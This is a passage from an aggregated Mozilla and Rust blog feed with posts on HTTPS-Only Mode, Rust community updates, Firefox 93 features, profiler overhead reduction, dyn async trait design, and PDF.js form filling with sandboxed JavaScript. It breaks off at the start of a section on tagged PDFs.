With HTTPS-Only Mode in Firefox, the browser forces all connections to websites to use HTTPS. Enabling this mode provides a guarantee that all of your connections to websites are upgraded to use HTTPS and hence secure. Some websites only support HTTP and the connection cannot be upgraded. If HTTPS-Only Mode is enabled and an HTTPS version of a site is not available, you will see a “Secure Connection Not Available” page. If you click Continue to HTTP Site, you accept the risk and will then visit an HTTP version of the site. HTTPS-Only Mode will be turned off temporarily for that site.

It’s not difficult for sites to convert. The website owner needs to get a certificate from a certificate authority to enable HTTPS. In December 2015, Mozilla joined with Cisco, Akamai, EFF and University of Michigan to launch Let’s Encrypt, a free, automated, and open certificate authority, run for the public’s benefit.

HTTPS across the web is good for Internet Health because it makes a more secure environment for everyone. Beyond encryption, it provides integrity, so a site can’t be modified, and authentication, so users know they’re connecting to the legit site and not some attacker. Lacking any one of these three properties can cause problems. More non-secure sites means more risk for the overall web.

If you come across a website that is not using HTTPS, send them a note encouraging them to get on board. Post on their social media or send them an email to let them know it matters: @favoritesite I love your site, but I noticed it’s not secure. Get HTTPS from @letsencrypt to protect your site and visitors. If you operate a website, encrypting your site will make it more secure for yourself and your visitors and contribute to the security of the web in the process.

In the meantime, share this article with your friends so they understand what HTTPS does and doesn’t do for their online security.

The post HTTPS and your online security appeared first on The Mozilla Blog.

Niko MatsakisCTCFT 2021-10-18 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-10-18 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

The theme for this meeting is exploring ways to empower and organize contributors.

  • (5 min) Opening remarks 👋 (nikomatsakis)
  • (5 min) CTCFT update (angelonfira)
  • (20 min) Sprints and groups implementing the async vision doc (tmandry)
  • (15 min) rust-analyzer talk (TBD)
    • The rust-analyzer project aims to succeed RLS as the official language server for Rust. We talk about how it differs from RLS, how it is developed, and what to expect in the future.
  • (10 min) Contributor survey (yaahc)
    • Introducing the contributor survey, its goals, methodology, and soliciting community feedback
  • (5 min) Closing (nikomatsakis)

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

This Week In RustThis Week in Rust 412

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Newsletters
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is flutter_rust_bridge, a memory-safe binding generator for Flutter/Dart ↔ Rust.

Thanks to fzyzcjy for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

353 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively quiet week: two smallish regressions, and one largish regression that is isolated to doc builds. A couple of nice small wins as well.

Triage done by @pnkfelix. Revision range: 25ec82..9475e6

2 Regressions, 2 Improvements, 2 Mixed; 1 of them in rollups
42 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

System 76

Enso

Second Spectrum

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust is the language where you get the hangover first.

unattributed via Niko Matsakis' RustConf keynote

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Performance BlogPerformance Sheriff Newsletter (August 2021)

In August there were 126 alerts generated, resulting in 16 regression bugs being filed on average 3.6 days after the regressing change landed.

Welcome to the August 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 0.8 days
  • 99% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 1.6 days
  • 86% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (August 2021)

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for August can be found here (for those with access).

The Talospace ProjectFirefox 93 on POWER

Firefox 93 is out, though because of inopportune scheduling at my workplace I haven't had much time to do much of anything other than $DAYJOB for the past week or so. (Cue Bill Lumbergh.) Chief amongst its features is AVIF image support (from the AV1 codec), additional PDF forms support, blocking HTTP downloads from HTTPS sites, new DOM/CSS/HTML support (including datetime-local), and most controversially Firefox Suggest, which I personally disabled since it gets in the way. I appreciate Mozilla trying to diversify its income streams, but I'd rather we could just donate directly to the browser's development rather than generally to Mozilla.

At any rate, a slight tweak was required to the LTO-PGO patch but otherwise the browser runs and functions normally using the same .mozconfigs from Firefox 90. Once I get through the next couple weeks hopefully I'll have more free time for JIT work, but you can still help.

Andrew HalberstadtTaskgraph Diff

Introducing taskgraph --diff to help validate your task configuration changes.

Hacks.Mozilla.OrgLots to see in Firefox 93!

Firefox 93 comes with lots of lovely updates including AVIF image format support, filling of XFA-based forms in its PDF viewer and protection against insecure downloads by blocking downloads relying on insecure connections.

Web developers are now able to use static initialization blocks within JavaScript classes, and there are some Shadow DOM and Custom Elements updates. The SHA-256 algorithm is now supported for HTTP Authentication using digests. This allows much more secure authentication than previously available using the MD5 algorithm.

This blog post provides merely a set of highlights; for all the details, check out the following:

AVIF Image Support

The AV1 Image File Format (AVIF) is a powerful, open source, royalty-free file format. AVIF has the potential to become the “next big thing” for sharing images in web content. It offers state-of-the-art features and performance, without the encumbrance of complicated licensing and patent royalties that have hampered comparable alternatives.

It offers much better lossless compression compared to PNG or JPEG formats, with support for higher color depths and transparency. As support is not yet comprehensive, you should include fallbacks to formats with better browser support (i.e. using the <picture> element).
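
For example, a page can offer AVIF with a JPEG fallback like this:

<picture>
  <source type="image/avif" srcset="photo.avif">
  <img src="photo.jpg" alt="A photo, served as AVIF where supported">
</picture>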

Read more about the AVIF image format in the Image file type and format guide on MDN.

Static initialization blocks

Support for static initialization blocks in JavaScript classes is now available in Firefox 93. This enables more flexibility as it allows developers to run blocks of code when initializing static fields. This is handy if you want to set multiple fields from a single value or evaluate statements.

You can have multiple static blocks within a class and they come with their own scope. As they are declared within a class, they have access to a class’s private fields. You can find more information about static initialization blocks on MDN.
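
Here’s a small example of the syntax: the block runs once when the class is evaluated and can set several static fields from a single computed value.

class Config {
  static defaults;
  static keys;
  static {
    // Runs once, when the class definition is evaluated.
    const raw = { theme: "dark", fontSize: 14 };
    Config.defaults = Object.freeze(raw);
    Config.keys = Object.keys(raw);
  }
}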

Custom Elements & Shadow DOM

In Firefox 92 the Imperative Slotting API was implemented, giving developers more control over assigning slots within a custom element. Firefox 93 includes support for the slotchange event that fires when the nodes within a slot change.

Also implemented in Firefox 93 is the HTMLElement.attachInternals() method. This returns an instance of ElementInternals, allowing control over an HTML element’s internal features. The ElementInternals.shadowRoot property was also added, meaning developers can gain access to the shadow root of elements, even if they themselves didn’t create the element.
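
A minimal sketch of the two APIs together (the element name is just an example):

class FancyNote extends HTMLElement {
  constructor() {
    super();
    const root = this.attachShadow({ mode: "closed" });
    root.textContent = "Hello from the shadow DOM";
    this.internals = this.attachInternals();
  }
}
customElements.define("fancy-note", FancyNote);

const note = document.createElement("fancy-note");
// element.shadowRoot is null for a closed shadow root, but the element's own
// ElementInternals still exposes it:
console.log(note.shadowRoot);            // null
console.log(note.internals.shadowRoot);  // the ShadowRoot created above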

If you want to learn more about Custom Elements and the Shadow DOM, check out MDN’s guides on the topics.

Other highlights

A few other features worth noting include:

The post Lots to see in Firefox 93! appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogReducing the Overhead of Profiling Firefox Sleeping Threads

The Firefox Profiler and its overhead

Firefox includes its own profiler: Visit profiler.firefox.com to enable it, and the user documentation is available from there.

The main advantages compared with using a third-party profiler are that it’s supplied with Firefox, it can capture screenshots, it understands JavaScript stacks, and Firefox is adding “markers” to indicate important events that may be useful to developers.

Its most visible function is to capture periodic “samples” of function call stacks from a number of threads in each process. Threads are selected during configuration in about:profiling, and can range from a handful of the most important threads, to all known threads.

This sampling is performed at regular intervals, by going through all selected threads and suspending each one temporarily while a sample of its current stack is captured (this is known as “stack walking”). This costly sampling operation can have a non-negligible impact on how the rest of the Firefox code runs; this is the “overhead” of the Profiler. In order to be able to sample as many threads as possible with the smallest impact, there is ongoing work to reduce this overhead.

Potential for optimization: Sleeping threads

One consideration is that most of the time, a large number of threads are not actually running, either because there is no work to be done (the user may not be interacting with Firefox), or because a thread may be waiting for the operating system to finish some long operation, like reading a file.

There are currently two ways to determine whether a thread can be considered “asleep”:

  • In the Firefox code, there are instructions like AUTO_PROFILER_THREAD_SLEEP, which indicate that a portion of code will be performing a small amount of work for an unknown duration that could stretch indefinitely. The most common situation is waiting for a condition variable to be signaled, for example when a task queue is waiting for a new task to be added; that addition may happen soon, or far into the future.
  • More recently, CPU utilization measurements were added to the Profiler. It is now possible to know if any activity happened since the previous sample; if it’s zero, we know for sure that the thread must be at the exact same spot as before, without needing to instrument the Firefox code.

For example, in the following screenshot of a profile, the “SwComposite” thread spends all its time waiting for an event. All 555 stack samples are exactly the same. Notice that the CPU utilization graph (in the top blue row) is not visible because it’s at zero.

Profile showing a sleeping thread where all samples are identical

Original optimization: Copy the previous sample

Once we know that a thread is effectively idle, we only need to capture one sample representative of this period, and then this sample may be simply copied, as long as the thread stays asleep. This was implemented back in 2014.

Diagram: Buffer with one sample from stack sampling, followed by 3 copies

The important advantage here is that threads don’t need to be actively suspended and sampled, which takes much more time.

However, performing this copy still takes some time, and uses the same space as before in the profile buffer.

New optimization: Refer to the previous sample

Instead of copying a full stack, the profiler now uses a much smaller entry indicating that this sample is exactly the same as the previous one. As a rough estimate, stack traces take around 300 bytes on average. The new “same as before” entry takes less than 30 bytes, a 10 times improvement!

Diagram: Buffer with one sample, followed by the small '=' entries

This may seem so obvious and simple, why wasn’t it done from the start, all those years ago?

Problem: Old samples get discarded

The profiler only has a finite amount of memory available to store its data while profiling, otherwise it would eventually use up all of the computer’s memory if we let it run long enough! So after some time, the profiler starts to drop the oldest data, assuming that the last part of the profiling session is usually the most important to keep.

In this case, imagine that one thread stays asleep for the whole duration of the profiling session. Its stack was captured once at the beginning, but after that it was copied again and again. This worked because even if we dropped old samples, we would still have full (copied) samples in the buffer.

Diagram: Buffer with 4 copies of a sample, the first two have been discarded, two full samples remain

But now that we use a special entry that only says “same as before”, we run the risk that the initial full stack gets dropped, and at the end we wouldn’t be able to reconstruct the identical samples for that sleeping thread!

Diagram: Buffer with one sample and 3 '=' entries, sample has been discarded, '=' entries don't know what they refer to anymore!

How can we ensure that we always keep samples for our sleeping threads?

Clue: Data is stored in chunks

An important detail of the profiler’s current implementation, is that instead of a traditional circular buffer, it uses “chunks” to store its data. A chunk is a memory buffer of a certain size, and we use a sequence of them to store the whole profile.

When a chunk becomes full, a new chunk is created and can store more data. After some time, the total size of all chunks in Firefox reaches a user-settable limit, at which point the oldest chunk is discarded — in practice it may be recycled for the next time a new chunk is needed, this removes some expensive memory allocation and de-allocation operations.

Thanks to this, we know that data is always removed chunk-by-chunk, so if one entry in a chunk refers to a previous entry in the same chunk, both entries are guaranteed to be present at the end, or both entries would have been discarded at the same time.

Solution: Keep at least one full sample per chunk

Finally, the solution to our problem becomes possible: Ensure that a full sample is always present in each chunk. How is that achieved, and why does it work?

During profiling, when the profiler is ready to store a “same as before” entry, it can check if the previous complete sample is in the same chunk, and if not, it will make a full copy of the stack from the previous chunk (there is a guarantee that the immediately-previous chunk cannot be discarded).

At the end of the profiling session, whichever chunk is first (the real first one, or the oldest one that still remains), it will always include a full sample, and the subsequent “same as before” entries will therefore have access to a full sample that can be copied.
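
In rough pseudocode (a sketch only, not the actual Gecko profiler code), the per-sample decision for a sleeping thread looks like this:

// Illustrative sketch: entries are either a full stack copy or a tiny
// "same as before" marker, and each chunk must contain at least one full copy.
#include <cstdint>
#include <vector>

enum class EntryKind : uint8_t { FullStackCopy, SameAsBefore };

struct Chunk {
  std::vector<EntryKind> entries;
  bool hasFullSample = false;
};

void SampleSleepingThread(Chunk& currentChunk) {
  if (!currentChunk.hasFullSample) {
    // First sleeping sample in this chunk: store a full copy of the last known
    // stack so the chunk can stand alone once older chunks are discarded.
    currentChunk.entries.push_back(EntryKind::FullStackCopy);
    currentChunk.hasFullSample = true;
  } else {
    // Otherwise a ~30-byte "same as before" entry is enough.
    currentChunk.entries.push_back(EntryKind::SameAsBefore);
  }
}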

Diagram with 2 buffer chunks, each has one sample and some '=' entries; when first chunk is discarded, the 2nd chunk is still readable.

Conclusion

In practice this optimization resulted in allowing around 50% more data to fit in profile buffers (because lots of samples now take a tiny space), and periodic sampling takes around 7 times less work than before (because we don’t need to find the old sample and copy it anymore).

This work was tracked in Bugzilla task 1633572, and landed on 2021-08-18 in Firefox 93, released on 2021-10-05. Thanks to my colleague Nazım Can Altınova for the code reviews.

It would theoretically be possible to further optimize sleeping thread sampling, but with diminishing returns. For example:

  • During profiling, a copy of the last sample could be kept outside of the chunked buffer, and then when necessary (at the end of the profiling session, or if the thread stops sleeping) that outside sample could be copied into the buffer, so it would be available when outputting sleeping samples. However this feels like even more complex work, and the potential space gains (by not having a full sample in each chunk) would be relatively small.
  • Instead of recording a “same as before” entry for each thread, we could skip all sleeping threads and only record one entry at the end of the sampling loop, meaning that any thread that didn’t get an explicit sample would be automatically considered asleep. This could give some useful savings when profiling many threads, because then it’s more likely that a large proportion would be asleep. This would probably be a fairly small space saving, but easy enough to implement that it could be worth it. To be continued!

If you have any questions, or would like to talk to the team, you can reach us in the “Firefox Profiler” room on chat.mozilla.org.

Niko MatsakisDyn async traits, part 4

In the previous post, I talked about how we could write our own impl Iterator for dyn Iterator by adding a few primitives. In this post, I want to look at what it would take to extend that to an async iterator trait. As before, I am interested in exploring the “core capabilities” that would be needed to make everything work.

Start somewhere: Just assume we want Box

In the first post of this series, we talked about how invoking an async fn through a dyn trait should have the return type of that async fn be a Box<dyn Future> — but only when calling it through a dyn type, not all the time.

Actually, that’s a slight simplification: Box<dyn Future> is certainly one type we could use, but there are other types you might want:

  • Box<dyn Future + Send>, to indicate that the future is sendable across threads;
  • Some other wrapper type besides Box.

To keep things simple, I’m just going to look at Box<dyn Future> in this post. We’ll come back to some of those extensions later.

Background: Running example

Let’s start by recalling the AsyncIter trait:

trait AsyncIter {
    type Item;

    async fn next(&mut self) -> Option<Self::Item>;
}

Remember that when we “desugared” this async fn, we introduced a new (generic) associated type for the future returned by next, called Next here:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

We were working with a struct SleepyRange that implements AsyncIter:

struct SleepyRange {  }
impl AsyncIter for SleepyRange {
    type Item = u32;
    
}

Background: Associated types in a static vs dyn context

Using an associated type is great in a static context, because it means that when you call sleepy_range.next(), we are able to resolve the returned future type precisely. This helps us to allocate exactly as much stack as is needed and so forth.

But in a dynamic context, i.e. if you have some_iter: Box<dyn AsyncIter> and you invoke some_iter.next(), that’s a liability. The whole point of using dyn is that we don’t know exactly what implementation of AsyncIter::next we are invoking, so we can’t know exactly what future type is returned. Really, we just want to get back a Box<dyn Future<Output = Option<u32>>> — or something very similar.

How could we have a trait that boxes futures, but only when using dyn?

If we want the trait to only box futures when using dyn, there are two things we need.

First, we need to change the impl AsyncIter for dyn AsyncIter. In the compiler today, it generates an impl which is generic over the value of every associated type. But we want an impl that is generic over the value of the Item type, but which specifies the value of the Next type to be Box<dyn Future>. This way, we are effectively saying that “when you call the next method on a dyn AsyncIter, you always get a Box<dyn Future> back” (but when you call the next method on a specific type, such as a SleepyRange, you would get back a different type — the actual future type, not a boxed version). If we were to write that dyn impl in Rust code, it might look something like this:

impl<I> AsyncIter for dyn AsyncIter<Item = I> {
    type Item = I;

    type Next<'me> = Box<dyn Future<Output = Option<I>> + 'me>;
    fn next(&mut self) -> Self::Next<'_> {
        /* see below */
    }
}

The body of the next function is code that extracts the function pointer from the vtable and calls it. Something like this, relying on the APIs from [RFC 2580] along with the function associated_fn that I sketched in the previous post:

fn next(&mut self) -> Self::Next<'_> {
    type RuntimeType = ();
    let data_pointer: *mut RuntimeType = self as *mut ();
    let vtable: DynMetadata = ptr::metadata(self);
    let fn_pointer: fn(*mut RuntimeType) -> Box<dyn Future<Output = Option<I>> + _> =
        associated_fn::<AsyncIter::next>(vtable);
    fn_pointer(data_pointer)
}

This is still the code we want. However, there is a slight wrinkle.

Constructing the vtable: Async functions need a shim to return a Box

In the next method above, the type of the function pointer that we extracted from the vtable was the following:

fn(*mut RuntimeType) -> Box<dyn Future<Output = Option<I>> + _>

However, the signature of the function in the impl is different! It doesn’t return a Box, it returns an impl Future! Somehow we have to bridge this gap. What we need is a kind of “shim function”, something like this:

fn next_box_shim<T: AsyncIter>(this: &mut T) -> Box<dyn Future<Output = Option<T::Item>> + _> {
    let future: impl Future<Output = Option<T::Item>> = AsyncIter::next(this);
    Box::new(future)
}

Now the vtable for SleepyRange can store next_box_shim::<SleepyRange> instead of storing <SleepyRange as AsyncIter>::next directly.

Extending the AssociatedFn trait

In my previous post, I sketched out the idea of an AssociatedFn trait that had an associated type FnPtr. If we wanted to make the construction of this sort of shim automated, we would want to change that from an associated type into its own trait. I’m imagining something like this:

trait AssociatedFn { }
trait Reify<F>: AssociatedFn {
    fn reify(self) -> F; 
}

where A: Reify<F> indicates that the associated function A can be “reified” (made into a function pointer) for a function type F. The compiler could implement this trait for the direct mapping where possible, but also for various kinds of shims and ABI transformations. For example, the AsyncIter::next method might implement Reify<fn(*mut ()) -> Box<dyn Future<..>>> to allow a “boxing shim” to be constructed and so forth.

Other sorts of shims

There are other sorts of limitations around dyn traits that could be overcome with judicious use of shims and tweaked vtables, at least in some cases. As an example, consider this trait:

pub trait Append {
    fn append(&mut self, values: impl Iterator<Item = u32>);
}

This trait is not traditionally dyn-safe because the append function is generic and requires monomorphization for each kind of iterator — therefore, we don’t know which version to put in the vtable for Append, since we don’t yet know the types of iterators it will be applied to! But what if we just put one version, the case where the iterator type is &mut dyn Iterator<Item = u32>? We could then tweak the impl Append for dyn Append to create this &mut dyn Iterator and call the function from the vtable:

impl Append for dyn Append {
    fn append(&mut self, mut values: impl Iterator<Item = u32>) {
        let values_dyn: &mut dyn Iterator<Item = u32> = &mut values;
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let f = associated_fn::<Append::append>(vtable);
        f(data_pointer, values_dyn);
    }
}

Conclusion

So where does this leave us? The core building blocks for “dyn async traits” seem to be:

  • The ability to customize the contents of the vtable that gets generated for a trait.
    • For example, async fns need shim functions that box the output.
  • The ability to customize the dispatch logic (impl Foo for dyn Foo).
  • The ability to customize associated types like Next to be a Box<dyn>:
    • This requires the ability to extract the vtable, as given by [RFC 2580].
    • It also requires the ability to extract functions from the vtable (not presently supported).

I said at the outset that I was going to assume, for the purposes of this post, that we wanted to return a Box<dyn>, and I have. It seems possible to extend these core capabilities to other sorts of return types (such as other smart pointers), but it’s not entirely trivial; we’d have to define what kinds of shims the compiler can generate.

I haven’t really thought very hard about how we might allow users to specify each of those building blocks, though I sketched out some possibilities. At this point, I’m mostly trying to explore the possibilities of what kinds of capabilities may be useful or necessary to expose.

Hacks.Mozilla.OrgImplementing form filling and accessibility in the Firefox PDF viewer

Intro

Last year, during lockdown, many discovered the importance of PDF forms when having to deal remotely with administrations and large organizations like banks. Firefox supported displaying PDF forms, but it didn’t support filling them: users had to print them, fill them by hand, and scan them back to digital form. We decided it was time to reinvest in the PDF viewer (PDF.js) and support filling PDF forms within Firefox to make our users’ lives easier.

While we invested more time in the PDF viewer, we also went through the backlog of work and prioritized improving the accessibility of our PDF reader for users of assistive technologies. Below we’ll describe how we implemented the form support, improved accessibility, and made sure we had no regressions along the way.

Brief Summary of the PDF.js Architecture

Overview of the PDF.js Architecture
To understand how we added support for forms and tagged PDFs, it’s first important to understand some basics about how the PDF viewer (PDF.js) works in Firefox.

First, PDF.js will fetch and parse the document in a web worker. The parsed document will then generate drawing instructions. PDF.js sends them to the main thread and draws them on an HTML5 canvas element.

Besides the canvas, PDF.js potentially creates three more layers that are displayed on top of it. The first layer, the text layer, enables text selection and search. It contains span elements that are transparent and line up with the text drawn below them on the canvas. The other two layers are the Annotation/AcroForm layer and the XFA form layer. They support form filling and we will describe them in more detail below.

Filling Forms (AcroForms)

AcroForms are one of the two types of forms that PDF supports, and the most common type of form.

AcroForm structure

Within a PDF file, the form elements are stored in the annotation data. Annotations in PDF are separate elements from the main content of a document. They are often used for things like taking notes on a document or drawing on top of a document. AcroForm annotation elements support user input similar to HTML inputs, e.g. text fields, check boxes, and radio buttons.

AcroForm implementation

In PDF.js, we parse a PDF file and create the annotations in a web worker. Then, we send them out from the worker and render them in the main process using HTML elements inserted in a div (annotation layer). We render this annotation layer, composed of HTML elements, on top of the canvas layer.

The annotation layer works well for displaying the form elements in the browser, but it was not compatible with the way PDF.js supports printing. When printing a PDF, we draw its contents on a special printing canvas, insert it into the current document and send it to the printer. To support printing form elements with user input, we needed to draw them on the canvas.

By inspecting (with the help of the qpdf tool) the raw PDF data of forms saved using other tools, we discovered that we needed to save the appearance of a filled field by using some PDF drawing instructions, and that we could support both saving and printing with a common implementation.

To generate the field appearance, we needed to get the values entered by the user. We introduced an object called annotationStorage to store those values by using callback functions in the corresponding HTML elements. The annotationStorage is then passed to the worker when saving or printing, and the values for each annotation are used to create an appearance.

Example PDF.js Form Rendering

On top, a filled form in Firefox; on the bottom, the printed PDF opened in Evince.

Safely Executing JavaScript within PDFs

Thanks to our Telemetry, we discovered that many forms contain and use embedded JavaScript code (yes, that’s a thing!).

JavaScript in PDFs can be used for many things, but is most commonly used to validate data entered by the user or automatically calculate formulas. For example, in this PDF, tax calculations are performed automatically starting from user input. Since this feature is common and helpful to users, we set out to implement it in PDF.js.

The alternatives

From the start of our JavaScript implementation, our main concern was security. We did not want PDF files to become a new vector for attacks. Embedded JS code must be executed when a PDF is loaded or on events generated by form elements (focus, input, …).

We investigated using the following:

  1. JS eval function
  2. JS engine compiled in WebAssembly with emscripten
  3. Firefox JS engine ComponentUtils.Sandbox

The first option, while simple, was immediately discarded since running untrusted code in eval is very unsafe.

Option two, using a JS engine compiled with WebAssembly, was a strong contender since it would work with the built-in Firefox PDF viewer and the version of PDF.js that can be used in regular websites. However, it would have been a large new attack surface to audit. It would have also considerably increased the size of PDF.js and it would have been slower.

The third option, sandboxes, is a feature exposed to privileged code in Firefox that allows JS execution in a special isolated environment. The sandbox is created with a null principal, which means that everything within the sandbox can only be accessed by it and can only access other things within the sandbox itself (and by privileged Firefox code).

Our final choice

We settled on using a ComponentUtils.Sandbox for the Firefox built-in viewer. ComponentUtils.Sandbox has been used for years now in WebExtensions, so this implementation is battle tested and very safe: executing a script from a PDF is at least as safe as executing one from a normal web page.

For the generic web viewer (where we can only use standard web APIs, so we know nothing about ComponentUtils.Sandbox) and the pdf.js test suite we used a WebAssembly version of QuickJS (see pdf.js.quickjs for details).

The implementation of the PDF sandbox in Firefox works as follows:

  • We collect all the fields and their properties (including the JS actions associated with them) and then clone them into the sandbox;
  • At build time, we generate a bundle with the JS code to implement the PDF JS API (totally different from the web API we are accustomed to!). We load it in the sandbox and then execute it with the data collected during the first step;
  • In the HTML representation of the fields we added callbacks to handle the events (focus, input, …). The callbacks simply dispatch them into the sandbox through an object containing the field identifier and linked parameters. We execute the corresponding JS actions in the sandbox using eval (it’s safe in this case: we’re in a sandbox). Then, we clone the result and dispatch it outside the sandbox to update the states in the HTML representations of the fields.
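
As a concrete (and heavily simplified) sketch of that flow, with hypothetical names rather than the actual PDF.js internals:

// Sketch only: hypothetical names, not the real PDF.js sandbox plumbing.
// JS actions collected from the PDF, keyed by field identifier.
const actionsByFieldId = {
  total: "event.value = Number(event.value) * 1.2;", // e.g. add 20% tax
};

// "Inside the sandbox": evaluate the action for a field and return the result.
function runActionInSandbox(detail) {
  const event = { value: detail.value };
  eval(actionsByFieldId[detail.id]); // acceptable: we are inside the sandbox
  return { id: detail.id, value: event.value };
}

// "Outside the sandbox": an HTML field dispatches its events inward and
// applies the returned (cloned) result back to the field.
function onFieldInput(fieldId, inputElement) {
  const result = runActionInSandbox({ id: fieldId, value: inputElement.value });
  inputElement.value = result.value;
}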

We decided not to implement the PDF APIs related to I/O (network, disk, …) to avoid any security concerns.

Yet Another Form Format: XFA

Our Telemetry also informed us that another type of PDF forms, XFA, was fairly common. This format has been removed from the official PDF specification, but many PDFs with XFA still exist and are viewed by our users so we decided to implement it as well.

The XFA format

The XFA format is very different from what is usually in PDF files. A normal PDF is typically a list of drawing commands with all layout statically defined by the PDF generator. However, XFA is much closer to HTML and has a more dynamic layout that the PDF viewer must generate. In reality XFA is a totally different format that was bolted on to PDF.

The XFA entry in a PDF contains multiple XML streams: the most important being the template and datasets. The template XML contains all the information required to render the form: it contains the UI elements (e.g. text fields, checkboxes, …) and containers (subform, draw, …) which can have static or dynamic layouts. The datasets XML contains all the data used by the form itself (e.g. text field content, checkbox state, …). All these data are bound into the template (before layout) to set the values of the different UI elements.

Example Template
<template xmlns="http://www.xfa.org/schema/xfa-template/3.6/">
  <subform>
    <pageSet name="ps">
      <pageArea name="page1" id="Page1">
        <contentArea x="7.62mm" y="30.48mm" w="200.66mm" h="226.06mm"/>
        <medium stock="default" short="215.9mm" long="279.4mm"/>
      </pageArea>
    </pageSet>
    <subform>
      <draw name="Text1" y="10mm" x="50mm" w="200mm" h="7mm">
        <font size="15pt" typeface="Helvetica"/>
        <value>
          <text>Hello XFA &amp; PDF.js world !</text>
        </value>
      </draw>
    </subform>
  </subform>
</template>
Output From Template

Rendering of XFA Document

The XFA implementation

In PDF.js we already had a pretty good XML parser to retrieve metadata about PDFs: it was a good start.

We decided to map every XML node to a JavaScript object, whose structure is used to validate the node (e.g. which children are allowed and how many of them). Once the XML is parsed and validated, the form data needs to be bound into the form template, and some prototypes can be used with the help of SOM expressions (a kind of XPath expression).

The layout engine

In XFA, we can have different kinds of layouts and the final layout depends on the contents. We initially planned to piggyback on the Firefox layout engine, but we discovered that unfortunately we would need to lay everything out ourselves because XFA uses some layout features which don’t exist in Firefox. For example, when a container is overflowing, the extra contents can be put in another container (often on a new page, but sometimes also in another subform). Moreover, some template elements don’t specify any dimensions, so their dimensions must be inferred from their contents.

In the end we implemented a custom layout engine: we traverse the template tree from top to bottom and, following layout rules, check if an element fits into the available space. If it doesn’t, we flush all the elements laid out so far into the current content area, and we move to the next one.
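
A toy sketch of that flush-and-move-on idea (greatly simplified, and not the actual PDF.js layout code) might look like this:

// Toy sketch of the "flush and move to the next content area" idea;
// the real PDF.js XFA layout engine handles many more rules.
function layOut(elements, areaHeight) {
  const areas = [[]];      // each area collects the elements it will hold
  let used = 0;            // vertical space used in the current area

  for (const element of elements) {
    // element.height may have been inferred from its contents and font.
    if (used + element.height > areaHeight) {
      areas.push([]);      // current area is full: move to the next one
      used = 0;
    }
    areas[areas.length - 1].push(element);
    used += element.height;
  }
  return areas;
}

// Example: three elements into 50-unit-tall content areas.
console.log(layOut([{ height: 30 }, { height: 30 }, { height: 10 }], 50));
// -> [ [ {height: 30} ], [ {height: 30}, {height: 10} ] ]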

During layout, we convert all the XML elements into JavaScript objects with a tree structure. Then, we send them to the main process to be converted into HTML elements and placed in the XFA layer.

The missing font problem

As mentioned above, the dimensions of some elements are not specified. We must compute them ourselves based on the font used in them. This is even more challenging because sometimes fonts are not embedded in the PDF file.

Not embedding fonts in a PDF is considered bad practice, but in reality many PDFs do not include some well-known fonts (e.g. the ones shipped by Acrobat or Windows: Arial, Calibri, …) as PDF creators simply expected them to be always available.

To have our output more closely match Adobe Acrobat, we decided to ship the Liberation fonts and glyph widths of well-known fonts. We used the widths to rescale the glyph drawing to have compatible font substitutions for all the well-known fonts.
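
The rescaling itself boils down to a per-glyph width ratio, roughly like the following sketch (the width values are made up for illustration):

// Illustrative sketch: widths are in 1/1000s of an em, as in PDF font metrics,
// and the numbers below are made up.
const missingFontWidths = { A: 612, B: 542, C: 580 };   // metrics we ship
const liberationWidths  = { A: 667, B: 667, C: 722 };   // substitute font

// Scale factor applied when drawing a glyph with the substitute font so the
// text occupies the width the missing font would have used.
function glyphScale(char) {
  return missingFontWidths[char] / liberationWidths[char];
}

console.log(glyphScale("A").toFixed(3)); // e.g. "0.918"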

Comparing glyph rescaling

On the left: default font without glyph rescaling. On the right: Liberation font with glyph rescaling to emulate MyriadPro.

The result

In the end, the result turned out quite well; for example, you can now open PDFs such as 5704 – APPLICATION FOR A FISH EXPORT LICENCE in Firefox 93!

Making PDFs accessible

What is a Tagged PDF?

